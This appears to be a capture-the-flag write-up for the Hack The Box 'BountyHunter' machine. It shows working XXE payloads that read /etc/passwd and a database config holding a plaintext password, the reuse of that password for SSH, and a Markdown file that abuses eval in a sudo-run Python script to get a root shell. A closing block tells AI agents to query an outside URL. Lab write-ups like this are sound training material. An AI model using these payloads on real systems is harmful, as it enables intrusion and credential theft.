# BOUNTYHUNTER

## Scanning

NMAP

```
➜  ~ nmap -T4 bountyhunter.htb 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 07:41 EDT
Nmap scan report for bountyhunter.htb (10.10.11.100)
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 22.44 seconds
```

*fast scan to know open ports we know from box name it will be web base box*

## Enumeration

**gobuster**

```
gobuster dir -u http://bountyhunter.htb/ -w /usr/share/wordlist/dirbuster/directory-list-lowercase-2.3-medium.txt -x php
. . .
/db.php
/resources
. . .
```

port **80**

![](/files/-MjjX9tMgfU5Sg8dYWE7)

home page

click portal ...

![](/files/-MjjX-kc7eGoEltJzNoB)

![](/files/-MjjWxylmaG7ksSwWDZN)

catch this form post request with Burpsuite

![](/files/-MjjWreGRWCFta5yK4nI)

lets decode data parameter to understand what's going on

![](/files/-MjjWo6TeI8fJ3S-r0Li)

XML ... lets try XXE injection

## Exploit

**Payload**

```markup
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>xxxxxxx</cwe>
        <cvss>xxxxxxx</cvss>
        <reward>xxxxxxx</reward>
        </bugreport>
```

encode to *Base64* then *URL* encoding

![](/files/-MjjWirjTBACKjm_xl5I)

send payload

![](/files/-MjjWbv2FnBtjBVLqI6a)

it works but wait ... will be back in second ...

after directory busting we found this directory

![](/files/-MjjWZp2dUZJpZzOIsTE)

open README.txt

![](/files/-MjjWVqzmiFihEh1d_Yq)

lets try to grab db.php file "gobuster output"

payload

```markup
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>xxxxxxx</cwe>
        <cvss>xxxxxxx</cvss>
        <reward>xxxxxxx</reward>
        </bugreport>
```

encode to *Base64* then *URL* encoding

![](/files/-MjjWR9CD1WYelUVIwcD)

send payload ...

![](/files/-MjjWOqeIIL7-G9qadsx)

```php
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
```

try to SSH admin user but it not working ...

lets try another user

![](/files/-MjjWKH0mLtP8aGR_dUU)

burp output when we trigger `/etc/passwd`

the user development look interesting *user with UID 1000 is probably the first user ever created on that particular system*

try too SSH `development` user with `m19RoAU0hP41A1sTsq6K` password

it works ! ....

![](/files/-MjjWI2_Agfo19mm0Td2)

* [x] USER SHELL ACCESS

## Privilege Escalation

check sudo rights `sudo -l`

![](/files/-MjjW7n-0WyfsP4FhLyY)

we can execute `/opt/skytrain_inc/ticketValidator.py` as root with no password

read to know what the script doing `cat /opt/skytrain_inc/ticketValidator.py`

```python
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
```

we gonna build the payload based on these lines

```python
if loc.endswith(".md"):
if not x.startswith("# Skytrain Inc"):
if not x.startswith("## Ticket to "):
if not x.startswith("**"):
            if int(ticketCode) % 7 == 4:
            ticketCode = x.replace("**", "").split("+")[0]
             if validationNumber > 100:
                    return TRUE
```

**Payload**

file name root.md

```
# Skytrain Inc
## Ticket to 
__Ticket Code:__
**11+101, __import__('os').system('bash')**
```

![](/files/-MjjW1zFppk50VCnNqeC)

* [x] ROOT SHELL ACCESS

Box creator include the Privilege Escalation payload in `/tmp/test.md`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xa1mn.gitbook.io/writeups/hack-the-box-htb/linux/bountyhunter.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.